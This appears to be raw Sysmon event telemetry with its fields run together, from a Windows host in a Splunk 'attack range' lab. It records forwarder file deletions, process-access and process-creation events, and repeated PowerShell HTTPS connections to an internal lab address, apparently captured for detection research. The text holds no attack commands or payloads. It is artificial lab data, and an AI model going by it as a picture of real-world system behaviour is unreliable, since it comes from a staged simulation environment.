Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4143416D52F0F33852665FD58B41F99,SHA256=4D643682C0FA5AA7F82FAD8892376F1D837E4CD1C716121081A1F4CCA26679B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:02.860{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4AE6CA0E46DEDD03D19D8E49FFD0480,SHA256=DDC70C605DA86ADDB9BBD4AAA3CDA999C943C841BC5E1C0E469DB432B7B4B6B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:27.142{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56636-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:02.157{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D6199401B440E8C1C4EDDD322B695ACE,SHA256=C2609986ED3C0AFAC6236C186DC49A6ABB46DCFE4A5313F36926354259D75EA7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:03.892{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54913D865734540C198E845C5FE24A75,SHA256=0A2E932924249042C4D7AE3AA1DE3C86FDA12036562FD2B51E0FCF25522B440B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:04.908{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68B7E051604D54F0135324B70121F46E,SHA256=1392C094A0F2C80373718C0DEE245C4C145DA7FADBCA8901F02CF1A915607393,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:29.097{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56637-false10.0.1.12-8000- 23542300x800000000000000035084681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:05.956{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9CF8FF3C840E6019F857DE6C552838E,SHA256=55FCE15A56EFC4C0AC065E8807D7852DA7E39D77D5570F315B86781FF71FCF6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:06.975{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D261E3B813A290D1C84624CA1857F9F5,SHA256=F0F3EC946A525034CB0917FE1D3F81314634756BAAB5F25CABC1AC28783EDB9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:07.990{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D7C6A3978C5BA2B757EA4FF066CB105,SHA256=8C3AAD5BB5340E351B71133805AD3F86D9B0DA90FCA92A9384A8CDD9EBCD3A1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:33.167{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56638-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:08.174{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=971C42AA85456FDC43BF6F5D73D2880E,SHA256=967111E1C04FAA4CBE32630C5BDF815C630A89B59816A4E376F8FFE9B71E195C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:09.036{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8591CB90DDE9821A5AA2B399CAED4D38,SHA256=7827CE9C10F944BA0128E66CD4BBDF0F8A8CCA0944DEEBE4A24177029EDA46AA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:34.197{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56639-false10.0.1.12-8000- 23542300x800000000000000035084687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:10.052{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=510C45B33482CD64A53650D9ADE38907,SHA256=DC60745BC9EAE8331502DC13D7268BB3B50F4FDE8B660940D6484AF277C8AFF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:11.071{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5F144DD89F86B1184D7908D619D73C2,SHA256=0D8705362B84A5EA45A8D05F48A6CCB8D480DE1AC8B12289A710D95B5F08757C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035084690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:12.101{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8E379782D7DE04578B3C7709FB7C012,SHA256=DE7A2A2D38BD69C8A35684D9486633910066525810009F7F9ECBE7678DDFFDEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E7D-613A-4490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:13.983{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:13.983{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:13.983{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4E7D-613A-4490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E7D-613A-4490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.969{B81B27B7-4E7D-613A-4490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:38.190{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56640-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035084701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.453{B81B27B7-4E7D-613A-4390-03000000C801}53445416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E7D-613A-4390-03000000C801}5344C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E7D-613A-4390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:13.284{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:13.284{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E7D-613A-4390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.269{B81B27B7-4E7D-613A-4390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=880E4FFB86ED3F1CF2765C2EAA2A6AD8,SHA256=54BA4175838E745DEFE96A194493395A3635A778897CBD5284059B57D270D5EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.131{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24A7A85C4FFFDFCF2BB48FB811838033,SHA256=08BE7868CA165897DEFBC5B96A39D02EFAE525813AD736AB11BA26568B35F3FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:14.498{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5991EBACD7F2DA81F79988389B73CF44,SHA256=B0FAF12D308B7CFB93789E64EF32705BAFC8EB27FBCB73B580C0AC1D4919B292,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:14.498{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 